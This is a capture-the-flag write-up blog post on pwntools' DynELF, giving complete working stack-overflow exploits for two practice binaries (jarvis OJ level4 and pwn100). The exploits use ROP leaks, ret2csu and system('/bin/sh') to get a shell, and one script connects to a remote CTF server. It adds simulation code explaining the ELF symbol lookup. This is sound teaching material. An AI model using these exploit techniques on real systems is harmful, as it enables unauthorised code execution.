DynELF module practice notes

jarvis OJ level4

```python
from pwn import *

elf = ELF('./level4')
r = process('./level4')

write_plt = elf.plt['write']
read_plt = elf.plt['read']
main = elf.symbols['main']
bss = elf.bss()              # writable scratch space for "/bin/sh"
pop3_ret = 0x08048509        # pop; pop; pop; ret -- cleans read()'s three arguments off the stack

# 140 bytes of padding reach the saved return address of the vulnerable function.
# Leak primitive for DynELF: write(1, address, 4), then return to main so the
# overflow can be triggered again for the next read.
def leak(address):
    payload = b'a' * 140 + p32(write_plt) + p32(main) + p32(1) + p32(address) + p32(4)
    r.send(payload)
    return r.recv(4)

d = DynELF(leak, elf=elf)
system_addr = d.lookup('system', 'libc')   # resolved through the leak, no libc file needed

# read(0, bss, 8) stores "/bin/sh" in .bss, then system(bss)
payload = b'a' * 140 + p32(read_plt) + p32(pop3_ret) + p32(0) + p32(bss) + p32(8)
payload += p32(system_addr) + p32(main) + p32(bss)
r.send(payload)
r.send(b'/bin/sh\x00')
r.interactive()
```
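What DynELF actually does with that `leak()` callback, as an added example that is not part of the original write-up and not pwntools' own code: a constructed in-memory 32-bit ELF image stands in for libc, a 4-byte write()-style primitive stands in for the level4 leak, and a small cache, a base finder and a symbol-table walk reproduce the lookup. The load address 0xf7e00000, the symbol offsets and the image layout are assumptions; real DynELF starts from a libc pointer it reads out of the target's GOT and walks DT_GNU_HASH/DT_HASH instead of scanning the symbol table linearly.

```python
import struct

PAGE = 0x1000

class FakeTarget:
    """Constructed stand-in for the remote process: bytes mapped in a dict; unmapped reads as 0."""
    def __init__(self):
        self.mem, self.calls = {}, 0
    def map(self, addr, data):
        for i, b in enumerate(data):
            self.mem[addr + i] = b
    def leak4(self, addr):
        """write(1, addr, 4)-style primitive, like leak() in the level4 script."""
        self.calls += 1
        return bytes(self.mem.get(addr + i, 0) for i in range(4))

class LeakCache:
    """Byte-granular reads on top of the 4-byte primitive; every chunk is cached,
    so repeated lookups cost no extra round trips (pwnlib's MemLeak plays this
    role for DynELF)."""
    def __init__(self, leak_fn):
        self.leak_fn, self.cache = leak_fn, {}
    def byte(self, addr):
        if addr not in self.cache:
            for i, b in enumerate(self.leak_fn(addr)):
                self.cache[addr + i] = b
        return self.cache[addr]
    def read(self, addr, n):
        return bytes(self.byte(addr + i) for i in range(n))
    def u32(self, addr):
        return struct.unpack('<I', self.read(addr, 4))[0]
    def u16(self, addr):
        return struct.unpack('<H', self.read(addr, 2))[0]
    def cstr(self, addr):
        out = b''
        while self.byte(addr + len(out)) != 0:
            out += bytes([self.byte(addr + len(out))])
        return out

def find_elf_base(cache, ptr):
    """DynELF's first step: from any pointer into libc (e.g. a leaked GOT entry)
    walk down page by page until the ELF magic appears."""
    addr = ptr & ~(PAGE - 1)
    while cache.read(addr, 4) != b'\x7fELF':
        addr -= PAGE
        if addr < 0:
            raise ValueError('no ELF header below pointer')
    return addr

def lookup_symbol(cache, base, name):
    """Resolve `name`: ELF header -> PT_DYNAMIC -> DT_SYMTAB/DT_STRTAB -> symbol table.
    Assumption for brevity: the symbol table is scanned linearly up to DT_STRTAB;
    real DynELF walks DT_GNU_HASH/DT_HASH instead."""
    phoff, phentsize, phnum = cache.u32(base + 0x1c), cache.u16(base + 0x2a), cache.u16(base + 0x2c)
    dyn = None
    for i in range(phnum):
        ph = base + phoff + i * phentsize
        if cache.u32(ph) == 2:                  # PT_DYNAMIC
            dyn = base + cache.u32(ph + 8)      # p_vaddr
    if dyn is None:
        return None
    strtab = symtab = None
    while True:
        tag, val = cache.u32(dyn), cache.u32(dyn + 4)
        if tag == 0:                            # DT_NULL
            break
        if tag == 5:                            # DT_STRTAB (already relocated by ld.so)
            strtab = val
        if tag == 6:                            # DT_SYMTAB
            symtab = val
        dyn += 8
    for sym in range(symtab, strtab, 16):       # Elf32_Sym is 16 bytes
        if cache.cstr(strtab + cache.u32(sym)) == name.encode():
            return cache.u32(sym + 4)           # st_value
    return None

def build_fake_libc(base, symbols):
    """Constructed minimal 32-bit ELF image as it would sit in memory: header,
    one PT_DYNAMIC phdr, a dynamic section, then symtab followed by strtab."""
    phoff, dyn_off = 0x34, 0x34 + 0x20
    symtab_off = dyn_off + 3 * 8
    strtab, syms = b'\x00', b'\x00' * 16         # entry 0 is STN_UNDEF
    for name, off in symbols.items():
        syms += struct.pack('<IIIBBH', len(strtab), base + off, 0, 0x12, 0, 0)
        strtab += name.encode() + b'\x00'
    strtab_off = symtab_off + len(syms)
    ehdr = struct.pack('<16sHHIIIIIHHHHHH', b'\x7fELF\x01\x01\x01', 3, 3, 1, 0,
                       phoff, 0, 0, 0x34, 0x20, 1, 0, 0, 0)
    phdr = struct.pack('<8I', 2, dyn_off, dyn_off, dyn_off, 0, 0, 6, 4)
    dyn = struct.pack('<6I', 6, base + symtab_off, 5, base + strtab_off, 0, 0)
    return ehdr + phdr + dyn + syms + strtab

def demo():
    """Hypothetical load address and offsets; returns (base, system address, leak calls)."""
    base = 0xf7e00000
    target = FakeTarget()
    target.map(base, build_fake_libc(base, {'puts': 0x5f140, 'system': 0x3a940, 'read': 0xd4350}))
    cache = LeakCache(target.leak4)
    found = find_elf_base(cache, base + 0xd4350)    # "read@got leaked from the binary"
    return found, lookup_symbol(cache, found, 'system'), target.calls
```

The call counter makes the cost visible: finding the base from a pointer 0xd4 pages above it takes one leak per page, and the symbol walk afterwards only touches a handful of 4-byte chunks, which is why the level4 script can afford to return to main after every single leak.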

攻防世界pwn100

This challenge is not friendly to beginners at all. I assumed it was a standard template problem and got burned.
First, check the protections:

```
[*] '/home/xiy/下载/pwn/pwn100'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```

NX is enabled, so shellcode is out; the goal has to be system('/bin/sh'). Throw the binary into IDA:
[Figure: c1.png]
[Figure: c2.png]
[Figure: c3.png]
As the figure above shows, there is a stack overflow, but it cannot be triggered by a plain overflow: the read loop only exits once exactly 200 bytes have been received, so every payload has to be padded to 200 bytes. Why 200? See the figure below.
[Figure: c4.png]
OK, check the strings: nothing useful at all (no "/bin/sh" and no system).
[Figure: c5.png]
What else can a beginner do? Without a libc file, the only option is to leak libc addresses through puts and let DynELF resolve system from them.

```python
from pwn import *

elf = ELF('./pwn100')
# r = process('./pwn100')
r = remote('111.198.29.45', 55352)

puts_plt = elf.plt['puts']
read_got = elf.got['read']
start = 0x400550            # _start: restart the program cleanly after each ROP chain
bss = 0x601000              # writable scratch space, found manually in IDA
pop_rdi = 0x0400763         # pop rdi; ret
gadget1 = 0x40075a          # __libc_csu_init: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
gadget2 = 0x400740          # __libc_csu_init: mov rdx, r13; mov rsi, r14; mov edi, r15d; call [r12+rbx*8]

# The vulnerable read loop only returns after exactly 200 bytes, so every
# payload is padded to 200.  72 bytes of padding reach the saved return address.
def leak(address):
    payload = b'a' * 72 + p64(pop_rdi) + p64(address) + p64(puts_plt) + p64(start)
    payload = payload.ljust(200, b'b')
    r.send(payload)
    r.recvuntil(b'bye~\n')
    # puts() stops at the first NUL byte and appends '\n'.  Read until the
    # stream goes quiet, then turn the trailing newline back into the NUL byte
    # puts stopped on.  DynELF accepts a short (partial) leak.
    data = b''
    while True:
        c = r.recv(numb=1, timeout=0.1)
        if c == b'' and data.endswith(b'\n'):
            data = data[:-1] + b'\x00'
            break
        data += c
    return data[:4]

d = DynELF(leak, elf=elf)
system_addr = d.lookup('system', 'libc')

# ret2csu: read(0, bss, 8) through the GOT entry of read, then return to _start.
payload = b'a' * 72
payload += p64(gadget1)
payload += p64(0)          # rbx = 0       -> call [r12 + rbx*8] = [read@got]
payload += p64(1)          # rbp = 1       -> rbx + 1 == rbp, the loop runs once
payload += p64(read_got)   # r12 = read@got
payload += p64(8)          # r13 -> rdx = 8 (count)
payload += p64(bss)        # r14 -> rsi = bss (buf)
payload += p64(0)          # r15 -> edi = 0 (stdin)
payload += p64(gadget2)
payload += b'a' * 56       # add rsp, 8 plus the six pops after the call
payload += p64(start)
payload = payload.ljust(200, b'b')

r.send(payload)
r.recvuntil(b'bye~\n')
r.send(b'/bin/sh\x00')

# system("/bin/sh") with the string now sitting in .bss
payload = b'a' * 72
payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(system_addr)
payload = payload.ljust(200, b'b')

r.send(payload)
r.interactive()
```
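Two parts of the pwn100 exploit that are easy to get wrong, as an added example that is neither the author's code nor pwntools code: turning a puts() leak back into memory bytes (including a pointer whose top bytes are NUL, which needs more than one leak), and laying out the __libc_csu_init chain. The memory image, MEM_BASE and the read@got value 0x601028 are constructed; the gadget addresses, the 72-byte padding and the 200-byte read length are the ones from the write-up, and the register mapping is the one the write-up's payload implies for this binary.

```python
import struct

def p64(v):
    return struct.pack('<Q', v)

# Constructed memory image (not a real dump): a GOT slot holding a libc pointer
# whose top two bytes are NUL, followed by a C string.  MEM_BASE is hypothetical.
MEM_BASE = 0x601018
MEM = p64(0x00007ffff7b04250) + b'/bin/sh\x00'

def puts_output(addr):
    """What puts(addr) would send back from MEM: bytes up to the first NUL,
    then a newline (the NUL itself is never printed)."""
    off = addr - MEM_BASE
    end = MEM.index(b'\x00', off)
    return MEM[off:end] + b'\n'

def puts_leak_to_bytes(line):
    """Map one captured puts() line back to memory contents, as the pwn100
    leak() does: everything before '\n' is data and the stop byte was 0.
    Bytes beyond that are unknown, so the result may be shorter than asked;
    DynELF's MemLeak accepts a partial leak and asks again for the rest."""
    if not line.endswith(b'\n'):
        raise ValueError('puts output must end with a newline')
    return line[:-1] + b'\x00'

def leak_u64(leak, addr):
    """Assemble an 8-byte word from a NUL-truncating leak by re-leaking at the
    first unknown byte.  A user-space pointer such as 0x00007f... always needs
    at least two rounds: six data bytes plus the NUL, then the last NUL."""
    got = b''
    while len(got) < 8:
        got += leak(addr + len(got))
    return struct.unpack('<Q', got[:8])[0]

def csu_chain(gadget1, gadget2, got_entry, rdi, rsi, rdx, ret_to):
    """ret2csu chain as laid out in the pwn100 exploit.  Register mapping is the
    one that payload implies for this binary's __libc_csu_init:
      gadget1: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
      gadget2: mov rdx, r13; mov rsi, r14; mov edi, r15d; call [r12+rbx*8];
               add rbx, 1; cmp rbx, rbp; jne gadget2; add rsp, 8; six pops; ret"""
    chain = p64(gadget1)
    chain += p64(0)            # rbx = 0  -> call [r12 + 0*8]
    chain += p64(1)            # rbp = 1  -> rbx + 1 == rbp, so the loop runs once
    chain += p64(got_entry)    # r12 = GOT slot of the function to call
    chain += p64(rdx)          # r13 -> rdx
    chain += p64(rsi)          # r14 -> rsi
    chain += p64(rdi)          # r15 -> edi
    chain += p64(gadget2)
    chain += b'a' * 56         # add rsp, 8 plus six pops after the loop exits
    chain += p64(ret_to)       # address the final ret lands on
    return chain

def pwn100_payload(chain, pad=72, total=200):
    """Prefix the padding that reaches the saved return address and fill to
    exactly 200 bytes, since the target's read loop returns only at 200."""
    payload = b'a' * pad + chain
    if len(payload) > total:
        raise ValueError('chain too long for the 200-byte read')
    return payload.ljust(total, b'b')

def demo():
    leak = lambda a: puts_leak_to_bytes(puts_output(a))
    ptr = leak_u64(leak, MEM_BASE)
    # hypothetical read@got 0x601028; bss and gadget addresses from the write-up
    chain = csu_chain(0x40075a, 0x400740, 0x601028, 0, 0x601000, 8, 0x400550)
    return ptr, pwn100_payload(chain)
```

Note that the csu chain plus the 72-byte padding comes to exactly 200 bytes, so the `ljust` in the exploit never adds anything for that stage; one more qword would no longer fit in the single read, which `pwn100_payload` reports instead of silently sending a truncated chain.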

Same module, different leak function, and a 64-bit program this time.
I first tried to find the .bss segment with the ELF module, but that did not work, so in the end I looked it up manually.
After getting a shell in local debugging, typed commands had no effect, but against the remote target it worked fine.

  • Copyright notice: unless stated otherwise, all articles on this blog are licensed under the Apache License 2.0. Please credit the source when reposting!
  • © 2020 丰年de博客
